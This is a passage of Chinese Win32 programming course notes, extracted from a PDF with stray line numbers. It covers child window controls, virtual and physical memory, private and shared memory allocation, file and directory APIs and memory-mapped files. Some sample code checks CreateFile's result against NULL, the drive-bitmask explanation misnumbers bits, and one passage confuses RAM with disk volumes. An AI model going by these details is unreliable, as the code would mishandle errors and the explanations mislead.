0, // horizontal position of window 在父窗口上的x坐标
33
0, // vertical position of window 在父窗口上的y坐标
34
400, // window width 控件宽度
35
300, // window height 控件高度
36
hwnd, // menu handle or child identifier 父窗口句柄
37
(HMENU)CWA_EDIT, // menu handle or child identifier 子窗口标识
38
gHinstance, // handle to application instance 模块
39
NULL // window-creation data 附加数据
40
);
41
42
// 创建"设置"按钮
43
CreateWindow(
44
TEXT("BUTTON"), // registered class name 注册的类名,使用BUTTON则为按钮
45
TEXT("设置"), // window name 按钮名称
46
WS_CHILD | WS_VISIBLE, // window style 子窗口控件样式:子窗口、创建后可以看到
47
450, // horizontal position of window 在父窗口上的x坐标
48
150, // vertical position of window 在父窗口上的y坐标
49
80, // window width 控件宽度
50
20, // window height 控件高度
51
hwnd, // menu handle or child identifier 父窗口句柄
52
(HMENU)CWA_BUTTON_0, // menu handle or child identifier 子窗口标识
53
gHinstance, // handle to application instance 模块
54
滴水逆向课程笔记 – Win32
子窗口控件 – 83
NULL // window-creation data 附加数据
55
);
56
57
// 创建"获取"按钮
58
CreateWindow(
59
TEXT("BUTTON"), // registered class name 注册的类名,使用BUTTON则为按钮
60
TEXT("获取"), // window name 按钮名称
61
WS_CHILD | WS_VISIBLE, // window style 子窗口控件样式:子窗口、创建后可以看到
62
450, // horizontal position of window 在父窗口上的x坐标
63
100, // vertical position of window 在父窗口上的y坐标
64
80, // window width 控件宽度
65
20, // window height 控件高度
66
hwnd, // menu handle or child identifier 父窗口句柄
67
(HMENU)CWA_BUTTON_1, // menu handle or child identifier 子窗口标识
68
gHinstance, // handle to application instance 模块
69
NULL // window-creation data 附加数据
70
);
71
72
break;
73
}
74
// 当按钮点击则处理
75
case WM_COMMAND:
76
{
77
// 宏WM_COMMAND中,wParam参数的低16位中有标识,根据标识我们才能判断哪个按钮和编辑框,使用LOWORD()
可以获取低16位
78
switch (LOWORD(wParam)) {
79
// 当按钮为设置
80
case CWA_BUTTON_0:
81
{
82
// SetDlgItemText函数修改编辑框内容
83
SetDlgItemText(hwnd, (int)CWA_EDIT, TEXT("HACK THE WORLD"));
84
break;
85
}
86
// 当按钮为获取
87
case CWA_BUTTON_1:
88
{
89
// MessageBox弹框输出编辑框内容
90
TCHAR szEditBuffer[0x80];
91
GetDlgItemText(hwnd, (int)CWA_EDIT, szEditBuffer, 0x80);
92
MessageBox(NULL, szEditBuffer, NULL, NULL);
93
break;
94
}
95
}
96
break;
97
}
98
}
99
100
// 必须要调用一个默认的消息处理函数,关闭、最小化、最大化都是由默认消息处理函数处理的
101
return DefWindowProc(hwnd, uMsg, wParam, lParam);
102
}
103
104
int APIENTRY WinMain(HINSTANCE hInstance,
105
HINSTANCE hPrevInstance,
106
LPSTR lpCmdLine,
107
int nCmdShow)
108
{
109
滴水逆向课程笔记 – Win32
子窗口控件 – 84
char szOutBuff[0x80];
110
111
// 1. 定义创建的窗口(创建注册窗口类)
112
TCHAR className[] = TEXT("My First Window");
113
WNDCLASS wndClass = {0};
114
// 设置窗口背景色
115
wndClass.hbrBackground = (HBRUSH)COLOR_BACKGROUND;
116
// 设置类名字
117
wndClass.lpszClassName = className;
118
// 设置模块地址
119
gHinstance = hInstance;
120
wndClass.hInstance = hInstance;
121
// 处理消息的窗口函数
122
wndClass.lpfnWndProc = WindowProc; // 不是调用函数,只是告诉操作系统,当前窗口对应的窗口回调函数是什么
123
// 注册窗口类
124
RegisterClass(&wndClass);
125
126
// 2. 创建并显示窗口
127
// 创建窗口
128
/*
129
CreateWindow 语法格式:
130
HWND CreateWindow(
131
LPCTSTR lpClassName, // registered class name 类名字
132
LPCTSTR lpWindowName, // window name 窗口名字
133
DWORD dwStyle, // window style 窗口外观的样式
134
int x, // horizontal position of window 相对于父窗口x坐标
135
int y, // vertical position of window 相对于父窗口y坐标
136
int nWidth, // window width 窗口宽度:像素
137
int nHeight, // window height 窗口长度:像素
138
HWND hWndParent, // handle to parent or owner window 父窗口句柄
139
HMENU hMenu, // menu handle or child identifier 菜单句柄
140
HINSTANCE hInstance, // handle to application instance 模块
141
LPVOID lpParam // window-creation data 附加数据
142
);
143
*/
144
HWND hWnd = CreateWindow(className, TEXT("窗口"), WS_OVERLAPPEDWINDOW, 10, 10, 600, 300, NULL,
NULL, hInstance, NULL);
145
146
if (hWnd == NULL) {
147
// 如果为NULL则窗口创建失败,输出错误信息
148
sprintf(szOutBuff, "Error: %d", GetLastError());
149
OutputDebugString(szOutBuff);
150
return 0;
151
}
152
153
// 显示窗口
154
/*
155
ShowWindow 语法格式:
156
BOOL ShowWindow(
157
HWND hWnd, // handle to window 窗口句柄
158
int nCmdShow // show state 显示的形式
159
);
160
*/
161
ShowWindow(hWnd, SW_SHOW);
162
163
// 3. 接收消息并处理
164
滴水逆向课程笔记 – Win32
子窗口控件 – 85
运行结果如下:
/*
165
GetMessage 语法格式:
166
BOOL GetMessage(
167
LPMSG lpMsg, // message information OUT类型参数,这是一个指针
168
// 后三个参数都是过滤条件
169
HWND hWnd, // handle to window 窗口句柄,如果为NULL则表示该线程中的所有消息都要
170
UINT wMsgFilterMin, // first message 第一条信息
171
UINT wMsgFilterMax // last message 最后一条信息
172
);
173
*/
174
MSG msg;
175
BOOL bRet;
176
while( (bRet = GetMessage( &msg, NULL, 0, 0 )) != 0)
177
{
178
if (bRet == -1)
179
{
180
// handle the error and possibly exit
181
sprintf(szOutBuff, "Error: %d", GetLastError());
182
OutputDebugString(szOutBuff);
183
return 0;
184
}
185
else
186
{
187
// 转换消息
188
TranslateMessage(&msg);
189
// 分发消息:就是给系统调用窗口处理函数
190
DispatchMessage(&msg);
191
}
192
}
193
194
return 0;
195
}
196
滴水逆向课程笔记 – Win32
子窗口控件 – 86
Windows预定义的窗口类可以在MSDN Library的CreateWindow函数下面找到:
滴水逆向课程笔记 – Win32
虚拟内存与物理内存 – 87
19 虚拟内存与物理内存
19.1 虚拟内存与物理内存的关系
每个进程都有自己的4GB内存,但是这个4GB内存并不是真实存在的,而是一块虚拟内存。
在进程A的0x12345678内存地址中存入一个值,在进程B的0x12345678内存地址中也存入一个值,两者并不会冲
突,而是各自存放各自的。
但是存放的这个值是存放在物理内存上的,所以这里的虚拟内存和物理内存就有一个对应关系,当你真正使用
的时候才会给分配物理内存,不使用的时候则就只有虚拟内存(空头支票)。
每一个物理内存的大小是4KB,按照4KB大小来分页(Page),所以如上图所示,就有物理页这个概念。
19.2 虚拟内存地址划分
每个进程都有4GB的虚拟内存,虚拟内存的地址是如何划分的?首先,我们需要知道一个虚拟内存分为高2G、
低2G。
滴水逆向课程笔记 – Win32
虚拟内存与物理内存 – 88
如下图所示,用户空间是低2G,内核空间是高2G,对我们来说只能使用低2G的用户空间,高2G内核空间是所
有进程共用的。
但是需要注意的是低2G的用户空间使用还有前64KB的空指针赋值区和后64KB的用户禁入区是我们目前不能使
用的。
术语:线性地址就是虚拟内存的地址
特别说明:线性地址有4G ,但未必都能访问,所以需要记录哪些地方分配了。
19.3 物理内存
19.3.1 可使用的物理内存
为了管理方便,物理内存以4KB大小来分页,那么在系统里面这个物理页的数量是多少呢?我使用的虚拟机是
可以设置内存大小的(从物理上可以理解为这就是一个内存条):
滴水逆向课程笔记 – Win32
虚拟内存与物理内存 – 89
比如我现在的是是2GB(2048MB),我们可以在任务管理器清晰的看见物理内存的总数是接近2048*1024的:
那么这一块物理内存能有多少物理页呢?我们可以将总数/4:
滴水逆向课程笔记 – Win32
虚拟内存与物理内存 – 90
也就是有524138个物理页(十进制),转为十六进制就是0x7FF6A
那么物理页面只有这些不够用该怎么办?这时候操作系统会分配硬盘空间来做虚拟内存。我们可以通过系统属
性来查看、更改当前分配的虚拟内存大小:
滴水逆向课程笔记 – Win32
虚拟内存与物理内存 – 91
可以看见当前初始大小是2046MB,那么这个是存放在哪的呢?我们可以在C盘下查看(需要显示系统隐藏文
件)pagefile.sys这个文件,它刚好是2046MB这个大小,这个文件就是用来做虚拟内存的:
滴水逆向课程笔记 – Win32
虚拟内存与物理内存 – 92
19.3.2 可识别的物理内存
32位操作系统最多可以识别物理内存为64G,但是操作系统会进行限制,例如XP这个系统只能识别4G的物理内
存(Windows Server 2003服务器版本可以识别4G以上)。
但是我们可以通过HOOK系统函数来突破XP操作系统的4GB限制。
19.4 物理页的使用
我们知道了进程在使用虚拟内存时,就会分配一块物理内存(物理页),但是有那么多程序,很快就会占满物
理页,操作系统不会这样设计,而是会去看你的程序是否需要频繁的使用物理页,如果不是很频繁就会将你存
储在物理页的内容放在pagefile.sys文件中,然后将这个物理页分配给其他需要的进程;
如果你的程序再次访问物理页的话,就会重新给你分配物理页,然后把数据从pagefile.sys文件中拿出来放到新
的物理页中,这都是操作系统在操作的,写程序是感受不到这样的细节的。
滴水逆向课程笔记 – Win32
私有内存的申请释放 – 93
1.
2.
20 私有内存的申请释放
物理内存分为两类,一个是私有内存(Private)一个是共享内存(Mapped),私有内存的意思是这块物理内
存(物理页)只有你使用,而共享内存则是多个进程一起用。
20.1 申请内存的两种方式
私有内存通过VirtualAlloc/VirtualAllocEx函数申请,这两个函数在底层实现是没有区别的,但是后者是
可以在其他进程中申请内存。
共享内存通过CreateFileMapping函数映射
20.2 内存申请与释放
申请内存的函数是VirtualAlloc,其语法格式如下:
第三、第四参数可以根据MSDN Library查看系统定义的:
LPVOID VirtualAlloc(
1
LPVOID lpAddress, // region to reserve or commit 要分配的内存区域的地址,没有特殊需求通常不指定
2
SIZE_T dwSize, // size of region 分配的大小,一个物理页大小是0x1000(4KB),看你需要申请多少个
物理页就乘以多少
3
DWORD flAllocationType, // type of allocation 分配的类型,常用的是MEM_COMMIT(占用线性地址,也需要物理
内存)和MEM_RESERVE(占用线性地址,但不需要物理内存)
4
DWORD flProtect // type of access protection 该内存的初始保护属性
5
);
6
滴水逆向课程笔记 – Win32
私有内存的申请释放 – 94
如下代码则表示申请2个物理页,占用线性地址并分配物理内存,该内存可读写:
那么内存申请好了我们不想要了,这时候就需要释放,释放函数为VirtualFree,其语法格式如下:
LPVOID pm = VirtualAlloc(NULL, 0x1000*2, MEM_COMMIT, PAGE_READWRITE);
1
滴水逆向课程笔记 – Win32
私有内存的申请释放 – 95
所以我们想要释放物理内存,释放线性地址就写如下代码:
20.3 堆与栈
之前我们学习过的malloc或者new申请内存,它们是申请的什么内存呢?其实通过它们申请的内存是假申请,
因为它们是从已经申请好的内存中申请给自己用的,通过它们申请的内存称为堆内存,局部变量称为栈内存。
无论堆内存还是栈内存,都是操作系统启动时操作系统使用VirtualAlloc函数替我们申请好的。
所以堆、栈的本质就是私有内存,也就是通过VirtualAlloc函数申请的。
BOOL VirtualFree(
1
LPVOID lpAddress, // address of region 内存区域的地址
2
SIZE_T dwSize, // size of region 内存大小
3
DWORD dwFreeType // operation type 如何释放,释放的类型,一共有两个类型:MEM_DECOMMIT(释放物理内存,
但线性地址保留)、MEM_RELEASE(释放物理内存,释放线性地址,使用这个设置的时候内存大小就必须为0)
4
);
5
VirtualFree(pm, 0, MEM_RELEASE);
1
int main(int argc, char* argv[])
1
{
2
int x = 0x12345678; // 栈
3
4
int* y = (int*)malloc(sizeof(int)*128); // 堆
5
6
return 0;
7
}
8
滴水逆向课程笔记 – Win32
共享内存的申请释放 – 96
21 共享内存的申请释放
21.1 共享内存
共享内存通过CreateFileMapping函数映射,该函数语法格式如下:
该函数的作用就是为我们准备好物理内存(物理页),但是创建好了并不代表就可以使用了,我们还需要通过
MapViewOffile函数将物理页与线性地址进行映射,MapViewOffile函数语法格式如下:
示例代码如下:
HANDLE CreateFileMapping( // 内核对象,这个对象可以为我们准备物理内存,还可以将文件映射到物理页
1
HANDLE hFile, // handle to file 文件句柄,如果不想将文件映射到物理页,则不指定该参
数
2
LPSECURITY_ATTRIBUTES lpAttributes, // security 安全属性,包含安全描述符
3
DWORD flProtect, // protection 保护模式,物理页的属性
4
DWORD dwMaximumSizeHigh, // high-order DWORD of size 高32位,在32位计算机里通常设置为空
5
DWORD dwMaximumSizeLow, // low-order DWORD of size 低32位,指定物理内存的大小
6
LPCTSTR lpName // object name 对象名字,公用时写,自己使用则可以不指定
7
);
8
LPVOID MapViewOfFile(
1
HANDLE hFileMappingObject, // handle to file-mapping object file-mapping对象的句柄
2
DWORD dwDesiredAccess, // access mode 访问模式(虚拟内存的限制必须比物理地址更加严格)
3
DWORD dwFileOffsetHigh, // high-order DWORD of offset 高32位,在32位计算机里通常设置为空
4
DWORD dwFileOffsetLow, // low-order DWORD of offset 低32位,指定从哪里开始映射
5
SIZE_T dwNumberOfBytesToMap // number of bytes to map 共享内存的大小,一般与物理页大小一致
6
);
7
滴水逆向课程笔记 – Win32
共享内存的申请释放 – 97
#include <windows.h>
1
2
#define MapFileName "共享内存"
3
#define BUF_SIZE 0x1000
4
HANDLE g_hMapFile;
5
LPTSTR g_lpBuff;
6
7
int main(int argc, char* argv[])
8
{
9
// 内核对象:准备好物理页,无效句柄值-1、物理页可读写、申请一个物理页
10
g_hMapFile = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, BUF_SIZE,
MapFileName);
11
// 将物理页与线性地址进行映射
12
g_lpBuff = (LPTSTR)MapViewOfFile(g_hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, BUF_SIZE);
13
14
// 向物理内存中存储
15
*(PDWORD)g_lpBuff = 0x12345678;
16
17
// 关闭映射,关闭映射则表示释放了线形地址,但是物理页还存在
18
UnmapViewOfFile(g_lpBuff);
19
// 关闭句柄,这样才能释放物理页,但需要等待物理页使用完毕才会真正的释放,这里只是告诉系统我们当前进程不使用该句
柄(物理页)罢了
20
CloseHandle(g_hMapFile);
21
return 0;
22
}
23
滴水逆向课程笔记 – Win32
文件系统 – 98
22 文件系统
文件系统是操作系统用于管理磁盘上文件的方法和数据结构;简单点说就是在磁盘上如何组织文件的方法。
在Windows下有NTFS、FAT32这两种文件系统,我们可以通过查看本地磁盘的属性查看:
22.1 卷相关API
卷可以理解为就是我们的本地磁盘(逻辑驱动器),我们可以把一块2GB的内存条分为两个卷,卷里头的就是
文件和目录。
22.1.1 获取卷(逻辑驱动器)
函数GetLogicalDrives用于获取当前计算机所有逻辑驱动器,语法格式为:
DWORD GetLogicalDrives(VOID); // 返回值是一个DOWRD,没有参数
1
滴水逆向课程笔记 – Win32
文件系统 – 99
如下图所示代码,我们最终获取到的就是一个十六进制的d,在MSDN Library中明确说明了这个返回值表示的
结果:
二进制位标志着存在哪些驱动器,位0为1则表示存在驱动器A,位1为1则表示存在驱动器B,以此类推,这里
我们获取的0xd二进制是1101,位1为1、位2为0、位3为1、位4为1,那么就表示我们存在驱动器A、C、D。
22.1.2 获取所有逻辑驱动器的字符串
函数GetLogicalDriveStrings用于获取所有逻辑驱动器的字符串,语法格式为:
// 获取卷(逻辑驱动器)
1
DWORD gLd = GetLogicalDrives();
2
printf("GetLogicalDrives: %x", gLd);
3
滴水逆向课程笔记 – Win32
文件系统 – 100
如下图所示我可以获取所有逻辑驱动器的字符串,那么很清晰的可以看见逻辑驱动器的字符串就是盘符加上冒
号和反斜杠:
22.1.3 获取卷(逻辑驱动器)的类型
函数GetLogicalDriveStrings用于获取卷的类型,语法格式为:
DWORD GetLogicalDriveStrings(
1
DWORD nBufferLength, // size of buffer 输入类型,要获取字符串的大小
2
LPTSTR lpBuffer // drive strings buffer 输出类型,将获取的字符串放到该参数中
3
);
4
// 获取一个逻辑驱动器的字符串
1
DWORD nBufferLength = 100;
2
char szOutBuffer[100];
3
GetLogicalDriveStrings(nBufferLength, szOutBuffer);
4
滴水逆向课程笔记 – Win32
文件系统 – 101
如下图所示,我获取了逻辑驱动器C的类型:
22.1.4 获取卷的信息
函数GetVolumeInformation用于获取卷的信息,语法格式为:
UINT GetDriveType(
1
LPCTSTR lpRootPathName // root directory 根目录,这里我们可以使用驱动器字符串
2
);
3
// 获取卷的类型
1
UINT type;
2
type = GetDriveType(TEXT("C:\\"));
3
4
if (type == DRIVE_UNKNOWN) {
5
printf("无法确定驱动器的类型 \n");
6
} else if (type == DRIVE_NO_ROOT_DIR) {
7
printf("根路径是无效的,例如: 在该路径上没有安装任何卷 \n");
8
} else if (type == DRIVE_REMOVABLE) {
9
printf("磁盘可以从驱动器中取出 \n");
10
} else if (type == DRIVE_FIXED) {
11
printf("磁盘不能从驱动器中取出 \n");
12
} else if (type == DRIVE_REMOTE) {
13
printf("该驱动器是一个远程(网络)驱动器 \n");
14
} else if (type == DRIVE_CDROM) {
15
printf("该驱动器是一个CD-ROM驱动器 \n");
16
} else if (type == DRIVE_RAMDISK) {
17
printf("该驱动器是一个RAM磁盘 \n");
18
}
19
滴水逆向课程笔记 – Win32
文件系统 – 102
如下图所示,我获取了逻辑驱动器C的相关信息:
BOOL GetVolumeInformation(
1
LPCTSTR lpRootPathName, // root directory 输入类型,驱动器字符串
2
LPTSTR lpVolumeNameBuffer, // volume name buffer 输出类型,返回卷名
3
DWORD nVolumeNameSize, // length of name buffer 输入类型,卷名长度
4
LPDWORD lpVolumeSerialNumber, // volume serial number 输出类型,卷宗序列号
5
LPDWORD lpMaximumComponentLength, // maximum file name length 输出类型,指定文件系统支持的文件名组件的
最大长度
6
LPDWORD lpFileSystemFlags, // file system options 输出类型,与指定文件系统相关的标志
7
LPTSTR lpFileSystemNameBuffer, // file system name buffer 输出类型,文件系统(如FAT或NTFS)名称
8
DWORD nFileSystemNameSize // length of file system name buffer 输入类型,文件系统名称的长度
9
);
10
// 获取卷的信息
1
TCHAR szVolumeName[260];
2
DWORD dwVolumeSerialNumber;
3
DWORD dwMaximumComponentLength;
4
DWORD dwFileSystemFlags;
5
TCHAR szFileSystemNameBuffer[260];
6
GetVolumeInformation("C:\\", szVolumeName, 260, &dwVolumeSerialNumber, &dwMaximumComponentLength,
&dwFileSystemFlags, szFileSystemNameBuffer, 260);
7
滴水逆向课程笔记 – Win32
文件系统 – 103
22.2 目录相关API
22.2.1 创建目录
函数CreateDirectory用于创建目录,其语法格式如下:
在C盘下创建test目录:
22.2.2 删除目录
函数RemoveDirectory用于删除目录,其语法格式如下:
BOOL CreateDirectory(
1
LPCTSTR lpPathName, // directory name 目录名称,需要指定完整路径包含盘符的
2
LPSECURITY_ATTRIBUTES lpSecurityAttributes // SD 安全属性,包含安全描述符
3
);
4
// 创建目录,如果不指定绝对路径,则默认会在程序当前目录下
1
CreateDirectory(TEXT("C:\\test"), NULL);
2
滴水逆向课程笔记 – Win32
文件系统 – 104
删除C盘下的test目录:
22.2.3 修改目录名称(移动)
函数MoveFile用于修改目录名称(移动),其语法格式如下:
将C盘下的test文件夹重命名为test1,也可以理解为以新的名称移动到新的目录下:
BOOL RemoveDirectory(
1
LPCTSTR lpPathName // directory name 目录名称,需要指定完整路径包含盘符的
2
);
3
// 删除目录
1
RemoveDirectory(TEXT("C:\\test"));
2
BOOL MoveFile(
1
LPCTSTR lpExistingFileName, // file name 目录名
2
LPCTSTR lpNewFileName // new file name 新目录名
3
);
4
// 修改目录名称(移动)
1
MoveFile(TEXT("C:\\test"), TEXT("C:\\test1"));
2
滴水逆向课程笔记 – Win32
文件系统 – 105
22.2.4 获取程序当前目录
函数GetCurrentDirectory用于获取程序当前目录,其语法格式如下:
滴水逆向课程笔记 – Win32
文件系统 – 106
示例代码:
22.2.5 设置程序当前目录
函数SetCurrentDirectory用于设置程序当前目录,其语法格式如下:
示例代码:
DWORD GetCurrentDirectory(
1
DWORD nBufferLength, // size of directory buffer 输入类型,获取当前目录名的大小
2
LPTSTR lpBuffer // directory buffer 输出类型,当前目录名称
3
);
4
// 获取程序当前目录
1
TCHAR dwOutDirectory[200];
2
GetCurrentDirectory(200, dwOutDirectory);
3
BOOL SetCurrentDirectory(
1
LPCTSTR lpPathName // new directory name 新的目录名称
2
);
3
// 设置程序当前目录
1
SetCurrentDirectory(TEXT("C:\\test"));
2
滴水逆向课程笔记 – Win32
文件系统 – 107
22.3 文件相关API
22.3.1 创建文件
函数CreateFile用于创建文件,其语法格式如下:
以可读可写方式不管有没有,有就覆盖没有就新建的方式创建一个隐藏文件:
HANDLE CreateFile(
1
LPCTSTR lpFileName, // file name 文件名
2
DWORD dwDesiredAccess, // access mode 访问模式
3
DWORD dwShareMode, // share mode 共享模式,如果为0则是排他性,就是目前在使用时
其他人是无法使用的
4
LPSECURITY_ATTRIBUTES lpSecurityAttributes, // SD 安全属性,包含安全描述符
5
DWORD dwCreationDisposition, // how to create 如何创建,可以打开一个已经存在的文件
6
DWORD dwFlagsAndAttributes, // file attributes 文件属性,可以创建隐藏文件
7
HANDLE hTemplateFile // handle to template file
8
);
9
// 创建文件
1
CreateFile(TEXT("C:\\A.txt"), GENERIC_READ|GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
FILE_ATTRIBUTE_HIDDEN, NULL);
2
滴水逆向课程笔记 – Win32
文件系统 – 108
22.3.2 关闭文件
函数CloseHandle用于关闭文件,其语法格式如下:
22.3.3 获取文件大小
函数GetFileSize用于获取文件大小,其语法格式如下:
BOOL CloseHandle(
1
HANDLE hObject // handle to object 文件句柄
2
);
3
滴水逆向课程笔记 – Win32
文件系统 – 109
示例代码如下:
22.3.4 获取文件的属性和信息
函数GetFileAttributes、GetFileAttributesEx用于获取文件的属性和信息,其语法格式如下:
示例代码如下:
DWORD GetFileSize(
1
HANDLE hFile, // handle to file 输入类型,文件句柄
2
LPDWORD lpFileSizeHigh // high-order word of file size,输出类型,高32位的文件大小,这个没有用,长度一
般在低32位中,也就是当前函数的返回值
3
);
4
// 创建文件
1
HANDLE hFile = CreateFile(TEXT("C:\\A.txt"), GENERIC_READ, 0, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
2
// 获取文件大小,单位是字节
3
DWORD lpFileSizeHigh;
4
DWORD dwLow = GetFileSize(hFile, &lpFileSizeHigh);
5
// 关闭文件
6
CloseHandle(hFile);
7
DWORD GetFileAttributes( // 这个仅能获取属性
1
LPCTSTR lpFileName // name of file or directory 文件或目录的名称
2
);
3
4
BOOL GetFileAttributesEx( // 这个可以获取属性、信息
5
LPCTSTR lpFileName, // file or directory name 输入类型,文件或目录的名称
6
GET_FILEEX_INFO_LEVELS fInfoLevelId, // attribute class 输入类型,这个只有GetFileExInfoStandard一
个值
7
LPVOID lpFileInformation // attribute information 输出类型,文件属性和信息的结果
8
);
9
滴水逆向课程笔记 – Win32
文件系统 – 110
22.3.5 读/写/拷贝/删除文件
函数ReadFile、WriteFile、CopyFile、DeleteFile用于读/写/拷贝/删除文件,其语法格式如下:
WIN32_FILE_ATTRIBUTE_DATA data; // 定义一个结构体
1
2
GetFileAttributesEx(TEXT("C:\\A.txt"), GetFileExInfoStandard, &data); // 传递结构体指针
3
滴水逆向课程笔记 – Win32
文件系统 – 111
示例代码如下(举一反三):
BOOL ReadFile( // 读取文件
1
HANDLE hFile, // handle to file 文件句柄
2
LPVOID lpBuffer, // data buffer 输出类型,数据放哪
3
DWORD nNumberOfBytesToRead, // number of bytes to read 要读多少字节
4
LPDWORD lpNumberOfBytesRead, // number of bytes read 真正读多少字节
5
LPOVERLAPPED lpOverlapped // overlapped buffer
6
);
7
8
BOOL WriteFile( // 写入文件
9
HANDLE hFile, // handle to file 文件句柄
10
LPCVOID lpBuffer, // data buffer 要写入的数据在哪
11
DWORD nNumberOfBytesToWrite, // number of bytes to write 要写多少字节
12
LPDWORD lpNumberOfBytesWritten, // number of bytes written 真正写多少字节
13
LPOVERLAPPED lpOverlapped // overlapped buffer
14
);
15
16
BOOL CopyFile( // 拷贝文件
17
LPCTSTR lpExistingFileName, // name of an existing file 已经存在的文件
18
LPCTSTR lpNewFileName, // name of new file 复制的文件
19
BOOL bFailIfExists // operation if file exists FALSE则复制位置的文件已经存在就覆盖,TRUE反之
20
);
21
22
BOOL DeleteFile( // 删除文件
23
LPCTSTR lpFileName // file name 文件名
24
);
25
#include <windows.h>
1
#include <stdlib.h>
2
3
int main(int argc, char* argv[])
4
{
5
HANDLE hFile = CreateFile(TEXT("C:\\A.txt"), GENERIC_READ, 0, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
6
// 读取文件
7
// 1. 分配空间
8
DWORD lpFileSizeHigh;
9
DWORD fileSize = GetFileSize(hFile, &lpFileSizeHigh);
10
LPSTR pszBuffer = (LPSTR)malloc(fileSize);
11
ZeroMemory(pszBuffer, fileSize);
12
// 2. 设置当前读取的位置
13
// 文件句柄、第几个开始读、高32位、从文件最开始的位置
14
SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
15
// 3. 读取数据
16
DWORD dwReadLength;
17
ReadFile(hFile, pszBuffer, fileSize, &dwReadLength, NULL);
18
// 4. 释放内存
19
free(pszBuffer);
20
// 5. 关闭文件
21
CloseHandle(hFile);
22
return 0;
23
}
24
滴水逆向课程笔记 – Win32
文件系统 – 112
22.3.6 查找文件
函数FindFirstFile、FindNextFile用于查找文件,其语法格式如下:
示例代码如下:
HANDLE FindFirstFile(
1
LPCTSTR lpFileName, // file name 输入类型,文件名
2
LPWIN32_FIND_DATA lpFindFileData // data buffer 输出类型,WIN32_FIND_DATA结构体指针,找到的文件数据
3
);
4
5
BOOL FindNextFile(
6
HANDLE hFindFile, // search handle 输入类型,搜索句柄
7
LPWIN32_FIND_DATA lpFindFileData // data buffer 输出类型,WIN32_FIND_DATA结构体指针,存放找到的文件数
据
8
);
9
滴水逆向课程笔记 – Win32
文件系统 – 113
WIN32_FIND_DATA firstFile;
1
WIN32_FIND_DATA nextFile;
2
// 在C盘下搜索.txt后缀的文件
3
HANDLE hFile = FindFirstFile(TEXT("C:\\*.txt"), &firstFile);
4
printf("第一个文件名: %s 文件大小: %d\n", firstFile.cFileName, firstFile.nFileSizeLow);
5
if (hFile != INVALID_HANDLE_VALUE) {
6
// 有搜索到,就使用FindNextFile寻找下一个文件,FindNextFile函数返回为真则表示搜索到了
7
while (FindNextFile(hFile, &nextFile)) {
8
printf("文件名: %s 文件大小: %d\n", nextFile.cFileName, nextFile.nFileSizeLow);
9
}
10
}
11
滴水逆向课程笔记 – Win32
内存映射文件 – 114
1.
2.
23 内存映射文件
23.1 什么是内存映射文件
内存映射文件就如下图,将硬盘某个文件映射到物理页上,然后再将物理页映射到虚拟内存中。
优点:
访问文件就像访问内存一样简单,想读就读,想怎么样就怎么样,不用那么繁杂;
当文件过大时,使用内存映射文件的方式,性能相对于普通I/O的访问要好很多。
23.2 内存映射文件读写
之前我们学习过用CreateFileMapping函数来创建共享内存,这个函数同样也可以将文件映射到物理页,只不过
在这之前我们需要传递一个文件句柄。
如下代码我们写了一个读取文件最开始第一个字节的值:
滴水逆向课程笔记 – Win32
内存映射文件 – 115
调用函数运行之后成功输出,并获取到对应内容:
DWORD MappingFile(LPSTR lpcFile) {
1
HANDLE hFile;
2
HANDLE hMapFile;
3
LPVOID lpAddr;
4
5
// 1. 创建文件(获取文件句柄)
6
hFile = CreateFile(lpcFile, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
7
8
// 判断CreateFile是否执行成功
9
if(hFile == NULL) {
10
printf("CreateFile failed: %d \n", GetLastError());
11
return 0;
12
}
13
14
// 2. 创建FileMapping对象
15
hMapFile = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, NULL);
16
17
// 判断CreateFileMapping是否执行成功
18
if(hMapFile == NULL) {
19
printf("CreateFileMapping failed: %d \n", GetLastError());
20
return 0;
21
}
22
23
// 3. 物理页映射到虚拟内存
24
lpAddr = MapViewOfFile(hMapFile, FILE_MAP_COPY, 0, 0, 0);
25
26
// 4. 读取文件
27
DWORD dwTest1 = *(LPDWORD)lpAddr; // 读取最开始的4字节
28
printf("dwTest1: %x \n", dwTest1);
29
// 5. 写文件
30
// *(LPDWORD)lpAddr = 0x12345678;
31
32
// 6. 关闭资源
33
UnmapViewOfFile(lpAddr);
34
CloseHandle(hFile);
35
CloseHandle(hMapFile);
36
return 0;
37
}
38
MappingFile(TEXT("C:\\A.txt"));
1
滴水逆向课程笔记 – Win32
内存映射文件 – 116
小技巧 → 在VC6中想要以HEX的形式查看某个文件的话可以在打开文件的时候这样设置:
举一反三,写文件也很简单,但是需要注意的是写文件不是立即生效的,而是先将写入的存放到缓存中,只有
等到你释放资源了才会把缓存里的值真正的写入到文件。
如果你希望修改可以立即生效,我们可以通过FlushViewOfFile函数来强制更新缓存,其语法格式如下:
示例代码:
BOOL FlushViewOfFile(
1
LPCVOID lpBaseAddress, // starting address 你要刷新的地址
2
SIZE_T dwNumberOfBytesToFlush // number of bytes in range 要刷新的大小(字节)
3
);
4
FlushViewOfFile(((LPDWORD)lpAddr), 4);
1
滴水逆向课程笔记 – Win32
内存映射文件 – 117
23.3 内存映射文件之共享
内存映射文件可以让2个进程同时共享一个文件:
其实本质很简单,我们只需要在创建FileMapping对象时候给其一个对象名称即可。
现在我们来A进程写入,B进程读取看看到底能不能跨进程恭喜,写入代码:
滴水逆向课程笔记 – Win32
内存映射文件 – 118
读取代码:
#define MAPPINGNAME "Share File"
1
2
DWORD MappingFile(LPSTR lpcFile) {
3
HANDLE hFile;
4
HANDLE hMapFile;
5
LPVOID lpAddr;
6
7
// 1. 创建文件(获取文件句柄)
8
hFile = CreateFile(lpcFile, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
9
10
// 判断CreateFile是否执行成功
11
if(hFile == NULL) {
12
printf("CreateFile failed: %d \n", GetLastError());
13
return 0;
14
}
15
16
// 2. 创建FileMapping对象
17
hMapFile = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, MAPPINGNAME);
18
19
// 判断CreateFileMapping是否执行成功
20
